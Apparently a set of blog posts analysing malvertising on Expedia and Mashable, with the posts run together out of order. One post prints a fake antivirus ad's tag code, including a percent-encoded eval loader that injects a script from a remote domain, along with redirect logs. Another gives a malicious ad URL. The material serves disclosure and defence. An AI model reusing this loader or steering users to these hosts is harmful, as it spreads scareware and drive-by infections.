Mike On Ads

Kudos to Andrew Dilling who sent me the full logs of this last night. I don’t have a contact @ Expedia but if someone does please shoot them a note.

Screenshot:

The popup:

Antivirus 2009 Download Page:

Tamper Data:

Calls:

GET http://www.expedia.com/
GET http://www.prolinar.com/?id=200811181921042
GET http://vernariostar.com/?id=200811181921042
GET http://www.google-analytics.com/ga.js
GET http://www.google-analytics.com/__utm.gif?utmwv[...]
http://vernariostar.com/includes.js
POST http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921
GET http://antivirusdefense.com/2009/1/freescan.php?nu=77075675

Code of the Ad tag page:

<html><body style="margin:0; padding:0;">
<a href="http://www.rhapsody.com/?ref=26ta7" target="_blank"><img src="http://www.triesto.com/banners-db/Rhapsody/Rhapsody_728×90_1.jpg" border=0></a>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));

</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-6195944-3");
pageTracker._trackPageview();
</script>

<script>
var action_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var target_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var warn_prod = "";
eval(unescape(’%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%6E%61%72%69%6F%73%74%61%72%2E%63%6F%6D%2F%69%6E%63%6C%75%64%65%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B’));

</script>

</body></html>

First off — the ad is still showing. If someone has a contact @ Mashable, it’d be good to send them a note.

Greg Yardley thinks that this ad is not served by the Adsense network but instead by Mashable’s internal salesforce and that they are simply using Google’s new AdManager product as their adserving solution. Digging through the tags, it’s unclear whether or not this is the case. The actual creative is hosted on the domain “pagead2.googlesyndication.com” which has traditionally been used to host Adsense creatives and ad tags. Google’s AdManager runs on a different domain — “partner.googleadservices.com” — but it is certainly possible that AdManager and AdSense share the same underlying static content delivery system. (someone from Google care to comment?)

This is an excellent example of the fact that URLs generally don’t provide enough information to identify who is delivering the actual advertisement on the page. In this Mashable/Google page, it is unclear — it could be Mashable’s internal salesforce selling the ad — or there could be some server-side integration between AdManager and Adsense and Adsense is responsible for serving this actual creative. Right Media suffered from many of the same problems — people would always yell at the Right Media Ad-Network whenever a creative hosted at content.yieldmanager.com was causing problems, even though that single domain was shared across 50+ networks.

The solution that we came up with @ RM was to start using DNS CNAME aliases when returning any and all content. A CNAME is a simple DNS record that simply says — “this domain name is an alias for this other domain name”. So for example, the domain “content.cpxinteractive.com” is an alias for “content.yieldmanager.com”. This way, if CPX was responsible for serving a bad ad the offending URL would be “content.cpxinteractive.com/ad.jpg” and not “ad.yieldmanager.com/ad.jpg”. CNAMEs allow central serving systems (eg, AdManager) to both hand out tags and return creative content tagged with an owner while still maintaining the same internal systems.

Matt Cannon sent this one over to me yesterday afternoon. He saw Google showing this lovely ad for MediaMan on mashable.com at about 1pm EST. MediaMan has been identified a long time ago as a malvertisement so it’s a surprise to see them popping up on the Adsense network. Details are below. Now I’m not posting this to shame Google (I’m sure their content team has already pulled this ad) — I’m posting this more as a call to action. It’s time that we start grouping together as an industry to help stop this. More thoughts coming on that shortly.

Screengrab of ad on Mashable:

Source of the ad (warning I would not open this if I were you):
http://pagead2.googlesyndication.com/pagead/imgad?id=CLK8lreVvKyciwEQ2AUYWjIIqyqX6hvFaHc

Screengrab of the ad:

And for the first time in a while (probably because I’m in Moscow!) I actually got the actual trigger, and got this nice popup:

and was redirected to this lovely landing page: